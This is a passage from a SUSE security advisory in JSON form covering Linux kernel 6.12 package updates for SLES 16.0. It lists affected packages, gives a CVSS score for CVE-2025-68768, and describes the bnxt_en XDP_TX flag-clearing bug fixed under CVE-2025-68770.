"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
